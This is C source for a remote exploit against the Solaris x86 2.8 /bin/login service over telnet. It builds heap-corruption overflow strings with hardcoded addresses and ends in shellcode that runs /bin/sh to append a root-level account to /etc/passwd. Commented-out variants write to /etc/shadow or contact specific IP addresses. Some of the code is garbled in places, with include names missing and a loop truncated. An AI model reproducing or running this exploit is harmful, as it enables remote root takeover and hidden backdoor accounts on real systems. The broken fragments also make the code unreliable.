/* * 2001.11.26 * Solaris x86 2.8 * /bin/login remote exploit * it works for telnet * This code so many fixed addresses,so it may not work on other systems... * Author: mat@monkey.org (JW. Oh) * No warranty! Use at your own risk! And don't ask me anything!!! * change exec_argv3 value to execute your own command * and use ip address instead of hostname for argv[0] * updated 2001.11.26. * added if you installed solaris x86 full package uncomment X86_FULL_PACKAGE end-user 0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS 0x080667b0->0x080689d4 at 0x000067b0: .bss ALLOC full users 0x080654e0->0x080656b8 at 0x000054e0: .got ALLOC LOAD DATA HAS_CONTENTS 0x080667b8->0x080689dc at 0x000067b8: .bss ALLOC if your system is not exploited with this exploit, try dump sections with gdb...and compare the .got,.bss section values... */ //#define X86_FULL_PACKAGE #include #include #include #include #include #include void dump_hex(char *str,char *data,int len) { int i; if(str) { printf("\n=======%s:%d========\n",str,len); }else{ printf("\n=======================\n"); } for(i=0;i0) { wc=send(sock,send_data,send_len,0); } rc=recv(sock,recv_buf,sizeof(recv_buf),0); if(rc>0) { dump_hex("recv",recv_buf,rc); } } void main(int argc,char *argv[]) { int sock; struct sockaddr_in address; int i; char send_data_1[]={ 0xff,0xfd,0x03, 0xff,0xfb,0x18, 0xff,0xfb,0x1f, 0xff,0xfb,0x20, 0xff,0xfb,0x21, 0xff,0xfb,0x22, 0xff,0xfb,0x27, 0xff,0xfd,0x05, 0xff,0xfb,0x23 }; char send_data_2[]={ 0xff,0xfa,0x1f,0x00,0x50,0x00,0x18, 0xff,0xf0, 0xff,0xfc,0x24 }; char send_data_3[]={ 0xff,0xfd,0x01, 0xff,0xfc,0x01 }; char str_buffer[1024*30]; int str_buffer_pos=0; char str_end[2]={0xd,0x0}; char *env_str; int env_str_len; char env_1[4]={0xff,0xfa,0x18,0x00}; char *terminal_name="xterm-debian"; char env_2[6]={0xff,0xf0,0xff,0xfa,0x23,0x00}; char *display="matter:0.0"; char env_3[7]={0xff,0xf0,0xff,0xfa,0x27,0x00,0x00}; char *display_var="DISPlAY"; char display_delimiter[1]={0x01}; char *display_value="matter:0.0"; char *environ_str; int environ_str_len; int env_cur_pos=0; int env_num; char env_4[2]={0xff,0xf0}; char exploit_buffer[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\r\n"; char login_buffer[]= "ji1=A ji2=A ji3=A ji4=A ji5=A ji6=A ji7=A ji8=A ji9=Z ji10=z\\\r\n\ ji11=B ji12=A ji13=A ji14=b ji15=A ji16=A ji17=A ji18=A ji19=B ji20=b\\\r\n\ ji21=C ji22=A ji23=A ji24=c ji25=A ji26=A ji27=A ji28=A ji29=C ji30=c\\\r\n\ ji32=D ji32=A ji33=A ji34=d ji35=A ji36=A ji37=A ji38=A ji39=D ji40=d\\\r\n\ ji41=E ji42=A ji43=A ji44=e j"; char realfree_edx[]={0x83,0x83,0x83,0x83}; //0xdf9d6361 : test $0x1,%dl¸¦ ³Ñ±â±â À§Çؼ­ char login_buffer1[]="=A j"; #ifdef X86_FULL_PACKAGE char t_delete_edi_plus_0x8[]={0x2f,0x80,0x06,0x08}; #else char t_delete_edi_plus_0x8[]={0x27,0x80,0x06,0x08}; #endif char t_delete_edi_plus_0xa[]="=A j"; char t_delete_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff}; char login_buffer1_0[]="=A ji48=A j "; #ifdef X86_FULL_PACKAGE char t_delete_edi_plus_0x20[]={0xf0,0x55,0x6,0x08}; #else char t_delete_edi_plus_0x20[]={0xe8,0x55,0x6,0x08}; #endif char login_buffer1_1[]="=\\\r\n\ ji51=F ji52=A ji53=A ji54=f ji55=A ji56=A j=iheol i58="; #ifdef X86_FULL_PACKAGE char t_delete2_param1[]={0x29,0x80,0x06,0x08}; #else char t_delete2_param1[]={0x21,0x80,0x06,0x08}; #endif char login_buffer1_2[]=" 6=8"; char link_pos[]={0x97,0xff,0xff,0xff,0xff,0xff,0xff}; //ù¹ø° A -1 ÀÓ char login_buffer2[]="A=AB"; // 0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS //0x80655a4 <_GLOBAL_OFFSET_TABLE_+208>: 0xdf9bd0b8 //(gdb) print/x 0x80655a4 - 0x20 //$1 = 0x8065584 #ifdef X86_FULL_PACKAGE char t_delete2_edi_plus_0x8[]={0x90,0x55,0x06,0x08}; //strncpy-0x20,ecx #else char t_delete2_edi_plus_0x8[]={0x84,0x55,0x06,0x08}; //strncpy-0x20,ecx #endif char login_buffer2_0[]="GHIJ"; char t_delete2_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff}; char login_buffer2_1[]="OPQRSTUVWXYZ"; //0x806810d : 'A' , "\n" #ifdef X86_FULL_PACKAGE char t_delete2_edi_plus_0x20[]={0x06,0x81,0x06,0x08}; //shellcode,eax #else char t_delete2_edi_plus_0x20[]={0xfe,0x80,0x06,0x08}; //shellcode,eax #endif //0x8067e01 : "heowahfoihewobhfoiewhiofhoewhofhoeiwhofwhofhiewwhfoiew char login_buffer2_2[]="efghijklmnopqrstuvwxyz0123456789A\\\r\n\ jk11=A jm21=C nj31=A jo41=A pi51=A jq61=A jr71=A js81=g jt91=A ju01=A jv11=A jw21=B jy";//31=A z";//4=A k2=A k3=A k"; #ifdef X86_FULL_PACKAGE //char strncpy_src[]={0xf9,0x3b,0x05,0x08}; char strncpy_src[]={0x31,0x80,0x06,0x08}; #else char strncpy_src[]={0xf1,0x3b,0x05,0x08}; #endif char env_buffer[]="hi1=A hi2=A hi3=A hi"; char pam_input_output_eax[]={0x48,0x8a,0x06,0x08}; //0x8068a48 char env_buffer0[]="hi5=A hi6=A hi7=A hi"; #ifdef X86_FULL_PACKAGE char free_dest_buffer[]={0x31,0x80,0x06,0x08}; #else char free_dest_buffer[]={0x29,0x80,0x06,0x08}; #endif char env_buffer2[]="zi9="; #ifdef X86_FULL_PACKAGE char free_dest_buffer2[]={0x31,0x80,0x06,0x08}; #else char free_dest_buffer2[]={0x29,0x80,0x06,0x08}; #endif char exp_buffer0[]="hello"; char jmp_code[]={0xeb,0xc}; char exp_buffer1[]="\\\r\nhhhhhhhhhhh"; char shellcode[]= { 0xeb,0x1d, 0x5e, /*popl %esi*/ 0x33,0xc0, /*xorl %eax,%eax*/ 0x50, /*pushl %eax - ,0x0*/ #ifdef X86_FULL_PACKAGE 0x68,0x46,0x81,0x06,0x08, 0x68,0x43,0x81,0x06,0x08, 0x68,0x40,0x81,0x06,0x08, 0x68,0x38,0x81,0x06,0x08, #else 0x68,0x3e,0x81,0x06,0x08, 0x68,0x3b,0x81,0x06,0x08, 0x68,0x38,0x81,0x06,0x08, 0x68,0x30,0x81,0x06,0x08, #endif #ifdef X86_FULL_PACKAGE 0xe8,0x25,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/ #else 0xe8,0x2e,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/ #endif 0xe8,0xde,0xff,0xff,0xff,0xff,0xff,0xff /*call again*/ }; char exec_argv0[]="/bin/sh"; char exec_argv1[]="sh"; char exec_argv2[]="-c"; char exec_argv3[]="/bin/echo met:x:0:1::/:/bin/sh>>/etc/passwd;"; //"/bin/echo met::11652::::::>>/etc/shadow;"; //"/bin/finger @210.111.69.137"; //211.59.123.155"; char extra_buffer[]="hihihiifhewiohfiowehfiohweiofhiowehfoihefe\\\r\n"; #ifdef X86_FULL_PACKAGE char free_dest_buffer3[]={0x31,0x80,0x06,0x08}; #else char free_dest_buffer3[]={0x29,0x80,0x06,0x08}; #endif char env_buffer5[]="70=b \\\r\n\ hr371=b hs372="; char pam_input_output_eax2[]={0xf5,0x3b,0x05,0x08}; char env_buffer5_0[]="473="; char pam_get_authtok_eax[]={0xf6,0x3b,0x05,0x08}; //0x8053bfa Àӽú¯Åë char pam_get_data_esi[]={0xa8,0xb1,0x06,0x08};//0x806b1a8 display=""; terminal_name=""; env_str_len= sizeof(env_1)+ strlen(terminal_name)+ sizeof(env_2)+ strlen(display)+ sizeof(env_3)+ strlen(display_var)+ sizeof(display_delimiter)+ strlen(display_value)+ sizeof(env_4); env_str=(char *)calloc(1,env_str_len); if(env_str) { env_cur_pos=0; memcpy(env_str+env_cur_pos,env_1,sizeof(env_1)); env_cur_pos+=sizeof(env_1); memcpy(env_str+env_cur_pos,terminal_name,strlen(terminal_name)); env_cur_pos+=strlen(terminal_name); memcpy(env_str+env_cur_pos,env_2,sizeof(env_2)); env_cur_pos+=sizeof(env_2); memcpy(env_str+env_cur_pos,display,strlen(display)); env_cur_pos+=strlen(display); memcpy(env_str+env_cur_pos,env_3,sizeof(env_3)); env_cur_pos+=sizeof(env_3); memcpy(env_str+env_cur_pos,display_var,strlen(display_var)); env_cur_pos+=strlen(display_var); memcpy(env_str+env_cur_pos,display_delimiter,sizeof(display_delimiter)); env_cur_pos+=sizeof(display_delimiter); memcpy(env_str+env_cur_pos,display_value,strlen(display_value)); env_cur_pos+=strlen(display_value); memcpy(env_str+env_cur_pos,env_4,sizeof(env_4)); env_cur_pos+=sizeof(env_4); } /*socket operation*/ sock=socket(AF_INET,SOCK_STREAM,0); if(sock<0) { return; } address.sin_family=AF_INET; address.sin_port=htons(23); //inet_pton(AF_INET,argv[1],&address.sin_addr); //on some system no inet_pton exists address.sin_addr.s_addr=inet_addr(argv[1]); if(connect(sock,(struct sockaddr *)&address,sizeof(address))<0) { return; } send_data(sock,NULL,0); send_data(sock,send_data_1,sizeof(send_data_1)); send_data(sock,send_data_2,sizeof(send_data_2)); //dump_hex("env",env_str,env_cur_pos); send_data(sock,env_str,env_cur_pos); free(env_str); send_data(sock,send_data_3,sizeof(send_data_3)); str_buffer_pos=0; memcpy(str_buffer+str_buffer_pos,exploit_buffer,strlen(exploit_buffer)); str_buffer_pos+=strlen(exploit_buffer); strcpy(str_buffer+str_buffer_pos,login_buffer); str_buffer_pos+=strlen(login_buffer); memcpy(str_buffer+str_buffer_pos,realfree_edx,sizeof(realfree_edx)); str_buffer_pos+=sizeof(realfree_edx); strcpy(str_buffer+str_buffer_pos,login_buffer1); str_buffer_pos+=strlen(login_buffer1); memcpy(str_buffer+str_buffer_pos,t_delete_edi_plus_0x8,sizeof(t_delete_edi_plus_0x8)); str_buffer_pos+=sizeof(t_delete_edi_plus_0x8); memcpy(str_buffer+str_buffer_pos,t_delete_edi_plus_0xa,strlen(t_delete_edi_plus_0xa)); str_buffer_pos+=strlen(t_delete_edi_plus_0xa); memcpy(str_buffer+str_buffer_pos,t_delete_edi_plus_0x10,sizeof(t_delete_edi_plus_0x10)); str_buffer_pos+=sizeof(t_delete_edi_plus_0x10); strcpy(str_buffer+str_buffer_pos,login_buffer1_0); str_buffer_pos+=strlen(login_buffer1_0); memcpy(str_buffer+str_buffer_pos,t_delete_edi_plus_0x20,sizeof(t_delete_edi_plus_0x20)); str_buffer_pos+=sizeof(t_delete_edi_plus_0x20); strcpy(str_buffer+str_buffer_pos,login_buffer1_1); str_buffer_pos+=strlen(login_buffer1_1); memcpy(str_buffer+str_buffer_pos,t_delete2_param1,sizeof(t_delete2_param1)); str_buffer_pos+=sizeof(t_delete2_param1); strcpy(str_buffer+str_buffer_pos,login_buffer1_2); str_buffer_pos+=strlen(login_buffer1_2); memcpy(str_buffer+str_buffer_pos,link_pos,sizeof(link_pos)); str_buffer_pos+=sizeof(link_pos); strcpy(str_buffer+str_buffer_pos,login_buffer2); str_buffer_pos+=strlen(login_buffer2); memcpy(str_buffer+str_buffer_pos,t_delete2_edi_plus_0x8,sizeof(t_delete2_edi_plus_0x8)); str_buffer_pos+=sizeof(t_delete2_edi_plus_0x8); strcpy(str_buffer+str_buffer_pos,login_buffer2_0); str_buffer_pos+=strlen(login_buffer2_0); memcpy(str_buffer+str_buffer_pos,t_delete2_edi_plus_0x10,sizeof(t_delete2_edi_plus_0x10)); str_buffer_pos+=sizeof(t_delete2_edi_plus_0x10); strcpy(str_buffer+str_buffer_pos,login_buffer2_1); str_buffer_pos+=strlen(login_buffer2_1); memcpy(str_buffer+str_buffer_pos,t_delete2_edi_plus_0x20,sizeof(t_delete2_edi_plus_0x20)); str_buffer_pos+=sizeof(t_delete2_edi_plus_0x20); strcpy(str_buffer+str_buffer_pos,login_buffer2_2); str_buffer_pos+=strlen(login_buffer2_2); memcpy(str_buffer+str_buffer_pos,strncpy_src,sizeof(strncpy_src)); str_buffer_pos+=sizeof(strncpy_src); memcpy(str_buffer+str_buffer_pos,env_buffer,strlen(env_buffer)); str_buffer_pos+=strlen(env_buffer); memcpy(str_buffer+str_buffer_pos,pam_input_output_eax,sizeof(pam_input_output_eax)); str_buffer_pos+=sizeof(pam_input_output_eax); memcpy(str_buffer+str_buffer_pos,env_buffer,strlen(env_buffer0)); str_buffer_pos+=strlen(env_buffer0); memcpy(str_buffer+str_buffer_pos,free_dest_buffer,sizeof(free_dest_buffer)); str_buffer_pos+=sizeof(free_dest_buffer); memcpy(str_buffer+str_buffer_pos,env_buffer2,strlen(env_buffer2)); str_buffer_pos+=strlen(env_buffer2); memcpy(str_buffer+str_buffer_pos,free_dest_buffer2,sizeof(free_dest_buffer2)); str_buffer_pos+=sizeof(free_dest_buffer2); strcpy(str_buffer+str_buffer_pos,exp_buffer0); str_buffer_pos+=strlen(exp_buffer0); memcpy(str_buffer+str_buffer_pos,jmp_code,sizeof(jmp_code)); str_buffer_pos+=sizeof(jmp_code); strcpy(str_buffer+str_buffer_pos,exp_buffer1); str_buffer_pos+=strlen(exp_buffer1); memcpy(str_buffer+str_buffer_pos,shellcode,sizeof(shellcode)); str_buffer_pos+=sizeof(shellcode); strcpy(str_buffer+str_buffer_pos,exec_argv0); str_buffer_pos+=strlen(exec_argv0)+1; strcpy(str_buffer+str_buffer_pos,exec_argv1); str_buffer_pos+=strlen(exec_argv1)+1; strcpy(str_buffer+str_buffer_pos,exec_argv2); str_buffer_pos+=strlen(exec_argv2)+1; strcpy(str_buffer+str_buffer_pos,exec_argv3); str_buffer_pos+=strlen(exec_argv3)+1; memcpy(str_buffer+str_buffer_pos,str_end,strlen(str_end)); str_buffer_pos+=strlen(str_end); { char buf[100]; fgets(buf,100,stdin); } printf("sending login!\n"); fflush(stdout); send_data(sock,str_buffer,str_buffer_pos); send_data(sock,NULL,0); printf("\n\n\npress return to send password\n..."); { char buf[100]; fgets(buf,100,stdin); } send_data(sock,str_buffer,strlen(str_buffer)+1); printf("\n\n\nwaiting for the realfree & t_delete to be called!\n...\n\n"); fflush(stdout); sleep(30); }